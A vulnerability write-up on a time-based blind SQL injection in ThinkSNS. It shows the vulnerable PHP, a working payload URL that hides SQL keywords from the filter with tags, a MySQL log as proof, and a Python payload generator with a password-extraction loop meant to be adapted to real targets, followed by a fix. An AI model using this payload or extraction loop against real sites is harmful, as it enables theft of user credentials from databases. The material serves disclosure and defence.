A SQL injection vulnerability in ThinkSNS (anti-injection bypass)
A SQL injection vulnerability exists in ThinkSNS: an attacker can bypass the application's anti-injection filtering and read arbitrary data from the database.
Vulnerable code: \apps\public\Lib\Action\TestAction.class.php, line 540:

public function updateCategorySort() {
    $stable = t($_GET['t']);
    !empty($stable) && model('CategoryTree')->setTable($stable)->updateSort();
}
In this code $stable is a table name, and it comes straight from the request: $stable = t($_GET['t']). Everything therefore depends on the t function; if t filters improperly, SQL injection follows. Note also how the value is used: it is passed to setTable() and ends up as an unquoted identifier in a SHOW COLUMNS FROM ... statement (see the MySQL log below, where t=user becomes ts_user), so escaping quotes with addslashes cannot protect it.
1) The processing logic of the t function (\core\OpenSociax\functions.inc.php, line 630):

/**
 * The t function filters tags and outputs clean text without HTML
 * @param string text content
 * @return string processed content
 */
function t($text) {
    $text = nl2br($text);
    $text = real_strip_tags($text);
    $text = addslashes($text);
    $text = trim($text);
    return $text;
}
In t, real_strip_tags is called before addslashes, so whatever real_strip_tags produces is what reaches the query.
2) The implementation of the real_strip_tags function (\core\OpenSociax\functions.inc.php, line 2274):

function real_strip_tags($str, $allowable_tags = "") {
    $str = html_entity_decode($str, ENT_QUOTES, 'UTF-8');
    return strip_tags($str, $allowable_tags);
}
real_strip_tags decodes HTML entities and then strips HTML tags, and that is exactly what makes t bypassable. The anti-injection check is a keyword regular-expression match on the raw request, so a keyword broken up by a throw-away tag, for example s<a>elect, does not match any keyword. When t then runs, real_strip_tags removes the <a> and the two fragments are joined back into select before the value reaches the SQL statement.
A time-based blind injection payload can therefore be built by splitting every SQL keyword with a bogus tag (and using /**/ in place of spaces):
/index.php?app=public&mod=Test&act=updateCategorySort&t=user/**/W<a>HERE/**/IF((S<a>ELECT/**/A<a>SCII(S<a>UBSTRING(PASSWORD,1,1))/**/F<a>ROM/**/ts_user/**/L<a>IMIT/**/1)=101,S<a>LEEP(2.02),0)%23
If ASCII(SUBSTRING(PASSWORD,1,1))=101, i.e. the first character of the password is 'e', SLEEP() is executed and the response is delayed; otherwise it returns immediately. The sleep value has to be changed between requests, because an identical parameter string is answered from a cache and no delay is observed; varying the decimal part, e.g. SLEEP(2.03) then SLEEP(2.04), gives every request a fresh string and defeats the cache.
Proof of exploit (local test):
http://FIG/thinksns-V3.1/index.php?app=public&mod=Test&act=updateCategorySort&t=user/**/W<a>HERE/**/IF((S<a>ELECT/**/A<a>SCII(S<a>UBSTRING(PASSWORD,1,1))/**/F<a>ROM/**/ts_user/**/L<a>IMIT 1)=101,S<a>LEEP(2.02),0)%23
The MySQL general log records the query as executed:
15 Query    SHOW columns from ts_user/**/where/**/if((select/**/ascii(substring(password,1,1)) from/**/ts_user/**/limit 1)=101,sleep(2.02),0)#
The keyword check has been bypassed and the injected condition runs inside SHOW COLUMNS, giving a working time-delay blind injection.
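To make the bypass and the extraction loop concrete, the following Python model is an added example, not ThinkSNS code and not part of the original write-up. It reimplements the t chain, the keyword filter it defeats, the payload generator, a simulated timing oracle, and the hardened table-name check. Assumptions, also marked in the code: PHP strip_tags is approximated by a regex that removes anything tag-shaped; the anti-injection check is modelled as a word-boundary keyword regex, since the write-up only says it is a keyword regular-expression match; the ts_ prefix and the SHOW COLUMNS query are taken from the MySQL log above; the password value and the response timing are constructed in memory.

```python
"""Model of the ThinkSNS t() filter chain, the tag-split bypass and the
time-based extraction loop. Added example; not ThinkSNS code."""
import html
import re

# assumption: PHP strip_tags() is approximated by removing anything tag-shaped.
TAG_RE = re.compile(r"<[^>]*>")


def real_strip_tags(s: str) -> str:
    """html_entity_decode(..., ENT_QUOTES, 'UTF-8') followed by strip_tags()."""
    return TAG_RE.sub("", html.unescape(s))


def addslashes(s: str) -> str:
    """PHP addslashes(): escapes backslash, both quotes and NUL."""
    return (s.replace("\\", "\\\\").replace("'", "\\'")
             .replace('"', '\\"').replace("\0", "\\0"))


def t(text: str) -> str:
    """The t() chain from the write-up: nl2br -> real_strip_tags -> addslashes -> trim."""
    text = re.sub(r"(\r\n|\n|\r)", r"<br />\1", text)  # nl2br
    text = real_strip_tags(text)
    text = addslashes(text)
    return text.strip()


# assumption: the anti-injection check is a keyword regex run on the raw parameter.
SQL_KEYWORDS = ("select", "union", "where", "from", "limit", "sleep",
                "substring", "ascii", "insert", "update", "delete")
KEYWORD_RE = re.compile(r"\b(" + "|".join(SQL_KEYWORDS) + r")\b", re.IGNORECASE)


def keyword_filter_flags(raw: str) -> bool:
    return KEYWORD_RE.search(raw) is not None


def split(keyword: str) -> str:
    """Insert a throw-away tag: the regex sees two fragments, strip_tags glues them back."""
    return keyword[0] + "<a>" + keyword[1:]


def build_t_param(pos: int, byte: int, delay: float) -> str:
    """The t= value: IF(ascii of password[pos] == byte, SLEEP(delay), 0); '#' drops the rest."""
    return (f"user/**/{split('where')}/**/if(({split('select')}/**/{split('ascii')}"
            f"({split('substring')}(password,{pos},1))/**/{split('from')}/**/ts_user"
            f"/**/{split('limit')}/**/1)={byte},{split('sleep')}({delay}),0)#")


def model_query(table_fragment: str) -> str:
    """assumption from the MySQL log: setTable() adds the ts_ prefix and runs SHOW COLUMNS."""
    return f"SHOW columns from ts_{table_fragment}"


SECRET = "e10adc39"  # constructed sample password, not real data


def simulated_server(t_param: str) -> float:
    """Stand-in target: applies t(), builds the query, returns the seconds it 'took'."""
    sql = model_query(t(t_param))
    m = re.search(r"substring\(password,(\d+),1\)\)[^=]*=(\d+),sleep\(([\d.]+)\)", sql)
    if not m:
        return 0.0
    pos, byte, delay = int(m.group(1)), int(m.group(2)), float(m.group(3))
    hit = pos <= len(SECRET) and ord(SECRET[pos - 1]) == byte
    return delay if hit else 0.0


def extract(length: int, oracle, base_delay: float = 2.02, step: float = 0.01) -> str:
    """Recover `length` characters through a timing oracle(t_param) -> elapsed seconds.
    The delay changes on every request, following the write-up's observation that an
    identical parameter string is answered from cache without sleeping."""
    recovered, delay = "", base_delay
    for pos in range(1, length + 1):
        for byte in range(32, 127):
            param = build_t_param(pos, byte, round(delay, 2))
            delay += step
            if oracle(param) >= base_delay:
                recovered += chr(byte)
                break
        else:
            break  # no candidate slept: end of string (or oracle noise)
    return recovered


IDENT_RE = re.compile(r"[A-Za-z0-9_]+")


def safe_table_name(raw: str) -> str:
    """Hardened form: a table name is an identifier, so validate it as one
    (a whitelist of known table names is stricter still)."""
    if not IDENT_RE.fullmatch(raw):
        raise ValueError("invalid table name")
    return raw


if __name__ == "__main__":
    p = build_t_param(1, 101, 2.02)
    print("raw flagged:", keyword_filter_flags(p))   # the filter misses the split keywords
    print("after t():", model_query(t(p)))           # the query seen in the MySQL log
    print("recovered:", extract(len(SECRET), simulated_server))
```

Against a real target the oracle would wrap an HTTP GET of the URL above and return the measured round-trip time, comparing it against a baseline rather than an exact value; the rest of the loop is unchanged. The important design point is that the keyword filter and t disagree about what the input means, and the only robust fix is safe_table_name: validate the parameter as the identifier it is instead of trying to recognise SQL in it.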
Solution:
Strengthen the filtering logic. Because $_GET['t'] is used as a table name, neither keyword matching nor addslashes is the right control: validate the value as an identifier (letters, digits and underscore only), or better, accept only names from a whitelist of known tables, and reject anything else before it reaches setTable().